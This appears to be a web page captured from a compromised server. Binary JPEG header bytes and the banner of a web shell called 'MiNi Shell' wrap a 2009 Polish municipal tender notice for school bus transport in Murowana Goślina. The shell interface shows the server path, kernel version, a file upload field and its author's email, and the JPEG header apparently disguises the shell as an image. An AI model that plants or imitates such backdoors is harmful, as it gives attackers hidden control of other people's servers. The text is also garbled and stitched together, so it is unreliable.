JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090306/52510-N-2009.html

<p class="kh_header"><b>Murowana Goślina: ŚWIADCZENIE USŁUG TRANSPORTOWYCH W ZAKRESIE DOWOZU DZIECI DO SZKÓŁ I PRZEDSZKOLI NA TERENIE GMINY MUROWANA GOŚLINA (NA TRESIE DOM -SZKOŁA-DOM) W TERMINIE OD DATY ZAWARCIA UMOWY DO 22 GRUDNIA 2010 R.</b><br>
<b>Numer ogłoszenia: 52510 - 2009; data zamieszczenia: 06.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Murowana Goślina , ul. Poznańska 18, 62-095 Murowana Goślina, woj. wielkopolskie, tel. 061 8122055, 8122363, 8122379, faks 061 8122140.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.murowana-goslina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG TRANSPORTOWYCH W ZAKRESIE DOWOZU DZIECI DO SZKÓŁ I PRZEDSZKOLI NA TERENIE GMINY MUROWANA GOŚLINA (NA TRESIE DOM -SZKOŁA-DOM) W TERMINIE OD DATY ZAWARCIA UMOWY DO 22 GRUDNIA 2010 R..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG TRANSPORTOWYCH W ZAKRESIE DOWOZU DZIECI DO SZKÓŁ I PRZEDSZKOLI NA TERENIE GMINY MUROWANA GOŚLINA (NA TRESIE DOM -SZKOŁA-DOM) W TERMINIE OD DATY ZAWARCIA UMOWY DO 22 GRUDNIA 2010 R. według nw. zadań:
-Zadanie nr 1 - dowóz dzieci do szkół z miejscowości: Nieszawa, Kąty, Łoskoń Stary, Przebędowo, Trojanowo wieś, Starczanowo, Raduszyn, Mściszewo
-zadanie nr 2 - dowóz dzieci do szkół z miejscowości: Łopuchowo, Łopuchówko, Trojanowo (szosa), Głębocko, Głęboczek, Zielonka, Huta Pusta, Boduszewo.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1)spełniają warunki określone w art. 22 ust. 1 Ustawy, tj.:
a)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (art. 22 ust. 1 pkt 1 u.p.z.p.), tj.: 
-posiadają aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej,
-posiadają aktualną licencję, o której mowa w art. 5 ustawy z dnia 06.09.2001 roku o transporcie drogowym (t.j. DzU 2007 Nr 125, poz. 874 ze zm.), udzieloną na okres obejmujący termin wykonywania zamówienia;
b)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia (art. 22 ust. 1 pkt 2 u.p.z.p.), tj. w szczególności: Wykonawcy muszą dysponować (np. leasing, najem, dzierżawa itp.) środkami transportu spełniającymi następujące wymagania w ilości minimalnej określonej dla każdego zadania (Wykonawca musi dysponować odrębnym taborem autobusowym dla każdego zadania):
zadanie nr 1
-ilość i pojemność: min. 2 szt. autobusów posiadających min. 52 miejsc siedzących. 
-wiek: nie starsze niż 1986 rok,
-stan techniczny:
-autobusy muszą posiadać badania techniczne,
-autobusy muszą mieć sprawną wentylację (nieprzeciekające okna, sprawne techniczne okna umożliwiające ich sprawne otwieranie i zamykanie i włazy w dachu autobusu), ogrzewanie i oświetlenie wewnętrzne, zapewniające pasażerom odpowiedni komfort jazdy (w okresie jesienno-zimowym temperatura wewnątrz pojazdu 10OC - 15OC). 
-autobusy nie mogą być wyposażone w uszkodzone i zabrudzone siedzenia - Wykonawca odpowiada za utrzymanie czystości i porządku 
w autobusach,
-oznakowanie - autobusy powinny być oznakowane tablicami do przewozu dzieci zgodnie z przepisami 
-łączność:
autobusy powinny posiadać łączność (np. z policją i pogotowiem ratunkowym) radiową, telefoniczną lub inną umożliwiającą szybką reakcję na wypadek jakichkolwiek zdarzeń,
-wszystkie autobusy muszą spełniać wymagania określone w rozporządzeniu Ministra Infrastruktury z dnia z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz.U. 2003 Nr 32, poz. 262 ze zmianami).

zadanie nr 2
-ilość i pojemność: min. 2 szt. autobusów posiadających min. 52 miejsc siedzących. 
-wiek: nie starsze niż 1986 rok,
-stan techniczny:
-autobusy muszą posiadać badania techniczne,
-autobusy muszą mieć sprawną wentylację (nieprzeciekające okna, sprawne techniczne okna umożliwiające ich sprawne otwieranie i zamykanie i włazy w dachu autobusu), ogrzewanie i oświetlenie wewnętrzne, zapewniające pasażerom odpowiedni komfort jazdy (w okresie jesienno-zimowym temperatura wewnątrz pojazdu 10OC - 15OC). 
-autobusy nie mogą być wyposażone w uszkodzone i zabrudzone siedzenia - Wykonawca odpowiada za utrzymanie czystości i porządku 
w autobusach,
-oznakowanie - autobusy powinny być oznakowane tablicami do przewozu dzieci zgodnie z przepisami 
-łączność:
autobusy powinny posiadać łączność (np. z policją i pogotowiem ratunkowym) radiową, telefoniczną lub inną umożliwiającą szybką reakcję na wypadek jakichkolwiek zdarzeń,
-wszystkie autobusy muszą spełniać wymagania określone w rozporządzeniu Ministra Infrastruktury z dnia z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz.U. 2003 Nr 32, poz. 262 ze zmianami).

c)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (art. 22 ust. 1 pkt 3 u.p.z.p.),
d)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 Ustawy; 
e)załączą dokumenty i oświadczenia potwierdzające spełnianie warunków, 
o których mowa w art. 22 ust. 1 i art. 24 Ustawy, których złożenia wymaga Zamawiający, zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 r. (DzU nr 87 poz. 605) w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane i określone w pkt. 10 SIWZ;
f)Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia (np. konsorcjum) zobowiązani są do ustanowienia Pełnomocnika celem reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich 
w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;
g)Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zobowiązany jest do złożenia dokumentów 
zgodnie z §2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. (DzU nr 87 poz. 605) w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane.
Opis sposobu dokonywania oceny spełniania warunków udziału 
w postępowaniu. Zamawiający dokona oceny spełnienia wymaganych warunków udziału w postępowaniu stosując ocenę zerojedynkową: spełnia/nie spełnia. Ocena spełniania ww. warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach lub oświadczeniach załączonych do oferty. Z treści dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)W celu wykazania spełnienia warunków udziału w postępowaniu opisanych 
w punkcie 9 SIWZ, wraz z ofertą wypełnioną na Formularzu Oferty każdy Wykonawca składa Zamawiającemu następujące dokumenty i oświadczenia:
a)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie 
o wpisie do ewidencji działalności gospodarczej (oryginał lub kserokopia poświadczona za zgodność z oryginałem przez Wykonawcę), wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich);
b)licencję, o której mowa w art. 5 ustawy z dnia 06.09.2001 roku o transporcie drogowym (t.j. DzU 2007 Nr 125, poz. 874 ze zm.) udzieloną na okres obejmujący termin wykonywania zamówienia;
c)oświadczenie Wykonawcy o spełnianiu warunków określonych 
w art. 22 ust. 1 u.p.z.p., stanowiące załącznik nr 1 do oferty 
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia - oświadczenie ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku);
d)oświadczenie Wykonawcy, że nie podlega wykluczeniu 
z postępowania na podstawie art. 24 u.p.z.p., stanowiące załącznik 
nr 2 do oferty(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe oświadczenia dla każdego z nich);
e)wykaz niezbędnych do wykonania narzędzi i urządzeń (środków transportu), jakimi dysponuje Wykonawca. Wykonawca zobowiązany jest do sporządzenia przedmiotowego wykazu oddzielnie dla każdej części zamówienia, uwzględniając w nim informacje, o których mowa w pkt 9.1)b) SIWZ, w szczególności zawierający informacje: rok produkcji; marka; liczba miejsc z rozbiciem na liczbę miejsc siedzących, stojących i razem; liczbę drzwi w tym dwuskrzydłowe; nt. stanu technicznego; nt. tablic; łączności; kas; wyposażenia; ubezpieczenia i badań technicznych. Wykaz będzie stanowił załącznik nr 3 do oferty;
f)ponadto Wykonawca składa:
(1)dokument ustanawiający Pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy 
w sprawie niniejszego zamówienia publicznego - w przypadku, gdy Wykonawcy składają wspólną ofertę, 
(2)stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej.
2)Postanowienia dotyczące Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej: 
Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 
19 maja 2006 r. (DzU Nr 81, poz. 605) w sprawie rodzaju dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać Zamawiający od Wykonawcy:
a)jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej w punkcie: 10.1)a) składa dokument lub dokumenty, wystawione kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
b)jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyższym punkcie a), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
2)Dokumenty są składane w formie oryginału lub kopii poświadczonej ZA ZGODNOŚĆ Z ORYGINAŁEM  przez Wykonawcę. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym - jak wyżej - przez Wykonawcę.
3)Jeżeli termin składania ofert ulegnie przesunięciu, wówczas dokumenty, które do tego czasu utraciły swą ważność winny zostać uaktualnione.
Pożądane przez Zamawiającego jest złożenie w ofercie spisu treści..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.murowana-goslina.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy
ul. Poznańska 18, 
62-095 Murowana Goślina, pokój nr 32.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2009 godzina 11:00, miejsce: Urząd Miasta i Gminy
ul. Poznańska 18, 
62-095 Murowana Goślina, 
pokój nr 1 kancelaria.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1)Zamawiający nie przewiduje:
a)udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 u.p.z.p.;
b)zawarcia umowy ramowej; 
c)rozliczeń w walucie obcej;
d)przeprowadzenia aukcji elektronicznej;
e)ustanowienia dynamicznego systemu zakupów
e)zwrotu kosztów udziału w postępowaniu. Wykonawcy ponoszą wszelkie koszty własne związane z przygotowaniem i złożeniem oferty, niezależnie od wyniku postępowania. Zamawiający w żadnym przypadku nie odpowiada za koszty poniesione przez Wykonawców w związku 
z przygotowaniem i złożeniem oferty. Wykonawcy zobowiązują się nie podnosić jakichkolwiek roszczeń z tego tytułu względem Zamawiającego, 
z zastrzeżeniem art. 93 ust. 4 u.p.z.p..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie nr 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usług transportowych w zakresie dowożenia dzieci do szkół gminnych i przedszkoli w okresie od dnia zawarcia umowy do 22.12.2010 r. zgodnie z kalendarzem roku szkolnego.

Przedmiotem zamówienia jest dowóz do Szkoły Podstawowej w Długiej Goślinie, Przedszkola Leśne Skrzaty, Szkoły Podstawowej nr 1, Szkoły Podstawowej nr 2, Gimnazjum nr 1, Gimnazjum nr 2, w Murowanej Goślinie na trasach i w terminach wyszczególnionych poniżej:

- w terminie od dnia zawarcia umowy do 19 czerwca 2009:
a)Dowóz dzieci do szkół: 
trasa nr 1-Kąty, Łoskot Stary, Trojanowo Wieś, Przebędowo, Murowana Goślina (Szkoła Podstawowa w Długiej Goślinie, Szkoła Podstawowa nr 1 i Gimnazjum nr 1 w Murowanej Goślinie). - 20 km.
trasa nr 2 - Starczanowo, Mściszewo, Raduszyn, Murowana Goślina (Szkoła Podstawowa nr 2, Gimnazjum nr 2) - 10 km
b)powrót dzieci ze szkół:
trasa nr 3-Kąty, Łoskot Stary, Trojanowo Wieś, Przebędowo, Murowana Goślina (Szkoła Podstawowa w Długiej Goślinie, Szkoła Podstawowa nr 1 i Gimnazjum nr 1 w Murowanej Goślinie). - 20 km.
trasa nr 4 - Kąty, Łoskot Stary, Trojanowo Wieś, Przebędowo, Murowana Goślina (Szkoła Podstawowa w Długiej Goślinie, Szkoła Podstawowa nr 1 i Gimnazjum nr 1 w Murowanej Goślinie). - 20 km.
trasa nr 5 - Murowana Goślina, Raduszyn, Mściszewo, Starczanowo (z Gimnazjum nr 2, Szkoły Podstawowej nr 2) - 10 km
Dobowa praca przewozowa  wynosi 80 km.
- w terminie od 1września  2009 do 22 grudnia 2010:
c)Dowóz dzieci do szkół: 
trasa nr 1-Kąty, Trojanowo Wieś, Przebędowo, Murowana Goślina (Szkoła Podstawowa w Długiej Goślinie, Szkoła Podstawowa nr 1 i Gimnazjum nr 1 w Murowanej Goślinie). - 18,3 km.
trasa nr 2 - Starczanowo, Mściszewo, Raduszyn, Murowana Goślina (Szkoła Podstawowa nr 2, Gimnazjum nr 2) - 10 km
d)powrót dzieci ze szkół:
trasa nr 3-Kąty, Trojanowo Wieś, Przebędowo, Murowana Goślina (Szkoła Podstawowa w Długiej Goślinie, Szkoła Podstawowa nr 1 i Gimnazjum nr 1 w Murowanej Goślinie). - 18,3 km.
trasa nr 4 - Kąty, Trojanowo Wieś, Przebędowo, Murowana Goślina (Szkoła Podstawowa w Długiej Goślinie, Szkoła Podstawowa nr 1 i Gimnazjum nr 1 w Murowanej Goślinie). - 18,3 km.
trasa nr 5 - Murowana Goślina, Raduszyn, Mściszewo, Starczanowo (z Gimnazjum nr 2, Szkoły Podstawowej nr 2) - 10 km
Dobowa praca przewozowa  wynosi 75 km..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zadanie nr 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usług transportowych w zakresie dowożenia dzieci do szkół gminnych i przedszkoli w okresie od dnia zawarcia umowy do 22.12.2010 r. zgodnie z kalendarzem roku szkolnego.

Przedmiotem zamówienia jest dowóz do Szkoły Podstawowej w Łopuchowie, Szkoły Podstawowej nr 1, Gimnazjum nr 1, w Murowanej Goślinie oraz, Przedszkola w Łopuchowie na trasach:
a)Dowóz dzieci do szkół: 
trasa nr 1- Głębocko, Głęboczek, Łopuchówko, Łopuchowo, Trojanowo (Szkoła Podstawowa w Łopuchowie, Szkoła Podstawowa nr 1, Gimnazjum nr1) - 20 km, 
trasa nr 2 - Zielonka, Huta Pusta, Boduszewo (Gimnazjum nr 1, Szkoła Podstawowa nr 1) - 10 km,
b)powrót dzieci ze szkół:
trasa nr 3- Łopuchowo, Łopuchówko, Głęboczek, Głębocko (ze Szkoły Podstawowej w Łopuchowie) - 10 km,
trasa nr 4 - Zielonka, Huta Pusta, Boduszewo (Gimnazjum nr 1, Szkoła Podstawowa nr 1) - 10 km,
trasa nr 5 - Głębocko, Głęboczek, Łopuchówko, Łopuchowo, Trojanowo (  Szkoła Podstawowa nr 1, Gimnazjum nr 1) - 20 km,
trasa nr 6 - Zielonka, Huta Pusta, Boduszewo (Gimnazjum nr 1, Szkoła Podstawowa nr 1) - 10 km.
Dobowa praca przewozowa  wynosi 80 km...</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com